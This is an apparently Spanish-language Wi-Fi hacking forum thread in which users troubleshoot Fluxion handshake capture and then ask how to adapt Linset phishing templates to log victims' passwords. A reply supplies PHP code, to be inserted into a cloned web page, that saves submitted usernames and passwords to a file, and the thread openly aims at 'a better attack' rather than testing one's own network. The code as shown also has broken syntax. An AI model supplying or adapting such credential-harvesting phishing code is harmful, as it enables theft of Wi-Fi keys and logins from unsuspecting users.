Estoy usando fluxion haciendo pruebas de seguridad.
Resulta que tengo un router comtred el negrito de jazztel y otro de orange un livebox pues bien con el de jazztel me pilla el handsnake y con el de orange no, cuando los dos reciben las misma datas por que puede ser el problema??
Se puede meter en fluxion un handsnake capturado con otro programa, me dice que esta corrupto con el de orange.
Supongo que cuela. Encuentra dónde fluxion guarda los handshakes y pegar ahí el handshake que has obtenido.
Supongo que tiene un directorio dedicado propio
Con
locate *.cap
Verás dónde se encuentran tus ficheros de capturas y lo encontrarás.
Ya nos comentarás algo.
¡Bienvenido a wifi-libre!
buenas ¿ nunca me ha pasado pero tengo un problema con fluxion resulta que todo va bien pero cuando va a sacar el handshake pone fixed channel wlan0mon y va cambiando canales? No se por que la verdad nunca me ha habia pasado la distro es kali linux 2018.2 vajo virtual box y el chipset es un ralink 3070 y la vercion del fluxion es 4.10 saludos y gracias espero no quibocarme de foro jeje
No atiendo por mail al no ser que tengas un problema para acceder a tu cuenta o historias del palo. Si tienes una idea o un problema para realizar una idea la cosa es hablar de ello en el foro.
ok caballero es que no se donde postear el tema lo posteare aqui ejeje. resulta que pude hacer un phising https bajo windows este finde de semana probare en linux que seguro que funcionara igual o mejor la cosa aqui viene se que linset tiene muy buenas plantillas para hacer phising el rpoblema que vale se coje el logins de la web pero genera un check.php lo que trato de hacer es que haga como la web de koala sus plantillas los guarda en un txt o sea la cosa seria asi modificar plantillas para hacer un mejor ataque y con soporte https lo que no se es como modficar las plantillas para que guarden la clave en un txt saludos caballero
ostias que bueno colega a ver si logro entenderlo la cosa es por ejemplo clonar la web y despues insertar el codigo php que grava la contraseña en un txt verdad
<?php
if($_POST){
$usuario = $_POST'user'];
$pass = $_POST'pass'];
$f = fopen("contraseña.html", "a");
fwrite ($f, '<font color="black">Red:</font><b><font color="red">'.$usuario.'</font></b><font color="black">]Password: </font><b><font color="red">'.$pass.'</font></b><font color="black">]</font><br>');
fclose($f);
}
?>
esto es lo que necesitas realmente para lo que quieres hacer, crea una página de prueba añades el código y ves lo que te hace y segun te haga, lo modificas a tu gusto.